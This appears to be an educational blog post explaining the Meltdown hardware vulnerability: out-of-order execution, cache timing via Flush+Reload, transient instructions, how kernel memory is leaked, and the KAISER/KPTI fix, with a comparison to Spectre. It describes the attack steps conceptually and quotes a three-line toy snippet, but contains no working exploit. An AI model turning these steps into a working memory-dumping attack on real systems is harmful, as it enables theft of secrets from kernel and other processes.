‘Melting’ down Meltdown

Allan Chang
Systems and Network Security
9 min readApr 18, 2020

By Borys Bryndak and Allan Chang.

In January 2018, we were introduced to a pair of hardware vulnerabilities known as Meltdown and Spectre. We are going to take a look at Meltdown today. Memory isolation is a central feature of modern operating systems which allows for both user memory and kernel memory to be mapped together into a single virtual address space. This typically means that one half of all possible addresses is occupied by the kernel, and is only accessible by the kernel, and the other half belongs to the user process. The separation between these parts is usually enforced at the hardware level via the supervisor bit that ensures that the kernel memory is only accessible when running kernel code. Meltdown attack “melts” this security boundary by allowing any user process to dump all the memory of the kernel, and even parts of the memory of other running processes in the system.

The repercussions of this vulnerability are considered catastrophic by many security experts, and yet no real-world exploitations of this vulnerability are known. A popular misconception is that this only affects Intel CPUs, but in the original research paper, the attack was successfully performed on a Galaxy S7 with Samsung Exynos 8 Octa 8890 SoC which consists of 4 ARM Cortex-A53CPU and 4 Exynos M1 “Mongoose” CPU where Samsung’s custom Exynos cores were determined to be vulnerable. A modified version of Meltdown targeting system registers rather than inaccessible memory is possible on some ARM processors.

What makes Meltdown unique is that it is a hardware attack which means it is independent of the operating system and does not rely on software vulnerabilities. Typically, the whole physical memory is mapped in kernel space so the kernel can access any data on the physical memory. This allows Meltdown to dump the contents of the entire physical memory, thus allowing it to view the contents of other processes running on the system and the memory used by guest virtual machines.

Before diving into Meltdown, it is necessary to understand several peculiar features of modern CPUs:

Out-of- Order Execution

A superscalar pipelined processor with five functional units. Tanenbaum, Structured Computer Organization, Fifth Edition

A main feature of modern superscalar processors is out of order execution. Each CPU consists of multiple components, or functional units, that perform different types of operations like addition, multiplication, division, or address resolution. Since these components are independent, the CPU can parallelize some instructions and achieve much higher effective computation speeds. Moreover, instructions can be split into several steps, like reading an operand, performing an arithmetic calculation, and writing the result back. This allows the CPU to pipeline the instructions, i.e., to work at different stages of different instructions simultaneously. So rather than execute instructions in order, the CPU looks ahead and executes operations that are likely to be conducted as soon as the resources are available. Advanced CPU architectures go as far as to execute some instructions even if the CPU doesn’t yet know if those operations have to be executed or not. By doing so, the CPU maximizes utilization of its components and speeds up the computation time as the CPU is not waiting for each operation until completion.

Memory Hierarchy

Illustration by Ryan J. Leng

Current memory technology lags behind computing technology. This is to say that a CPU can process data much faster than any storage device can fetch it. To remedy the memory bottleneck, computers have multiple layers of memory using different memory technologies with the fastest and the most expensive ones being closest to the CPU (the cache), and slower but larger ones (DRAM) being next to the permanent storage like a hard disk or SSD. Each level is faster than the level below it, and each level stores recently used sections of memory from the lower level in the hope that it can be quickly fetched when it is used again.

Such configuration significantly improves computer performance, but introduces a subtle vulnerability. If several processes or several threads within the same process have access to a page in memory, they can easily check whether that page has been recently used by simply measuring the time it takes to access it. Meltdown takes advantage of this through a Fetch+Reload side-channel attack, where it uses the timing difference between memory accesses to communicate illegally accessed data to the attacker. More on this later.

The Attack

Pseudo-C++ code snippet showing a possible implementation of Meltdown attack

A key component of Meltdown is the usage of transient instructions and transient instruction sequences.

1 raise_exception(); 
2 // the line below is never reached
3 access(probe_array[data * 4096]);

Toy example from Lipp et al. [1]

Here we see the 3rd line of the code is never executed because an exception is raised before the point is reached. This is a transient instruction as it will never be executed. Any sequence of instructions that will never be executed is called a transient instruction sequence.

Why are transient instructions relevant? When the code executes out-of-order, the transient instructions are executed but never committed so it would appear that the instructions were never executed. Even though we do not see the results of the instructions, it does leave traces of the data in the CPU cache as the CPU cache is not cleared when switching from user mode to kernel mode. Using a cache side-channel attack, we are able to extract the value that is stored in the CPU cache, thus reading the kernel memory without proper permissions.

When operating in user space, it cannot access kernel memory unless it is running kernel code which is monitored by the hardware level supervisor bit. Though it cannot access kernel memory in user mode, the whole kernel memory is still mapped in the virtual address space. Therefore, the kernel virtual memory address points to a valid memory address on the physical memory. Due to the fact that there is a legitimate mapping of a kernel memory address to physical address, we can still access the kernel memory in user space even without proper permissions. Without the proper permissions, if we try to access kernel memory, it would raise an exception but with out-of-order execution, the CPU may access the memory address without permission but it would not commit the results into a state visible to the user until execution reached the point of commitment.

In the attack, the first thing to do is set up an array which will be known as the probe array. This array will be used to communicate our secret value using a cache-side channel attack such as Flush+Reload.

Then, we prepare a sequence of instructions that reads a secret value from the kernel space and use the value as an index to access the probe array. This is to generate a transient instruction sequence that the CPU will execute but never commit as the branch is never reached.

When running the code in user mode, if we want to access a secret value that is stored in kernel memory, it would raise an exception and terminate the program as we do not have the proper permissions. This can be bypassed with two methods. We can either fork the process and access the memory in the child process, or we can use transactional memory which makes the sequence of memory access act as a single instruction. Thus, when an illegal memory access is performed, the transaction stops and the code continues on as normal.

If we use our example of a parent and child process, after the process is forked, due to out-of-order execution, transient instructions are executed which includes reading from kernel memory thus obtaining a secret value and performing operations based on the secret value extracted from the kernel memory. When the CPU realizes that this is an illegal instruction, the process terminates and brings the control back to the parent process.

As the process was discarded, we cannot observe the effects of the transient instructions but it does leave the cache in the CPU modified. This is important as we will use the cache to communicate the secret value.

To communicate the secret value, we use an attack called Flush+Reload. First we clear the CPU cache to make sure our probe array is not cached. When a process is forked, the child process makes a copy of the memory. Due to Copy-on-Write (COW) policy, the memory is not copied until there is a write operation, the parent and child process share the same the same physical memory address until a write. When the child process reads the secret value from the kernel memory, it uses the probe array to communicate the results by simply reading (and therefore caching) a page from the probe array.

How do we communicate the result using an array? By checking the time it takes to read from the probe array.

The two processes are most likely running in two different cores with private L1 and L2 cache levels. But the L3 cache is shared between all cores in a CPU. So if the parent process notices that the time to read a page from the probe array is similar to what it takes to read from L3 cache, it can conclude that the child process has accessed that page, which means that this page’s index is the secret value that was read by the child process.

By repeating this procedure many times, it is possible to dump the entire kernel address space together with the physical memory mapped into it at the rate of 3.2 to 503 KB/s.

What was the solution?

KAISER was the proposed software fix. What KAISER does is rather than mapping the whole kernel memory in the user’s virtual address space, only the required kernel memory addresses for the few x86 architecture operations are accessible in user space. The few required kernel memory addresses do not store any secrets so it is unlikely for a leakage. In addition, by only having the essential kernel memory address mapped in user space, the size is so small thus finding the location of the kernel memory in the virtual address space is non-trivial. In Linux, known as Kernel Page-Table Isolation (KPTI), this creates two page tables, one page table is for user mode and the other page table is for kernel mode. By using two page tables, when in user mode, only the user mode table can be accessed. This means, only the user memory space and the required kernel memory is mapped in the virtual memory address space. Only when you are in kernel mode, do you have access to the rest of the kernel mode memory, including a mapping of the whole physical address space.

Though Meltdown may be fixed in newer Intel processors, the concept of the attack spawn a new wave of research into the field of out-of-order execution security flaws. In March 2020, a new theoretical attack was discovered known as Load Value Injection (LVI).

The key takeaway is that there are always new security flaws to be discovered and we should always be aware that today, we might assume our systems are secure, but a novel attack may be discovered tomorrow.

Meltdown vs. Spectre

Meltdown and Spectre have the same fundamental idea: they leverage out-of-order execution and a cache covert channel to infer data that was not supposed to be accessible to them. The key difference between Meltdown and Spectre is that Meltdown is completely independent from the victim’s software. It works whenever there is a vulnerable CPU and an unpatched operating system. However, it is also more limited for the same reason: not all CPUs are vulnerable, and operating systems have known solutions to prevent it. In fact, the solution to Meltdown (KAISER) was known even before Meltdown appeared, though it was intended to solve a different but related problem.

Spectre requires an attacker to find specific vulnerabilities to each piece of software that they want to break. For instance, the above code snippet can be used to leak the value of target_array[x] similarly to the way it was done in Meltdown. Except that transient instructions under the condition are forced by mistraining the CPU to always go along that branch, but then using a value of x that is out of bounds of target_array. The CPU will still speculatively execute the branch and perform the access to the probe_array based on the value outside target_array. From there, we already know how to reconstruct that value.

References

[1] M. Lipp, M. Schwarz, D. Gruss, T. Prescher, W. Haas, A. Fogh, J. Horn, S. Mangard, P. Kocher, D. Genkin, Y. Yarom, and M. Hamburg, “Meltdown: Reading kernel memory from user space,” in 27th USENIX Security Symposium (USENIX Security 18), 2018.

[2] P. Kocher, J. Horn, A. Fogh, , D. Genkin, D. Gruss, W. Haas, M. Hamburg, M. Lipp, S. Mangard, T. Prescher, M. Schwarz, and Y. Yarom, “Spectre attacks: Exploiting speculative execution,” in 40th IEEE Symposium on Security and Privacy (S&P’19), 2019.

--

--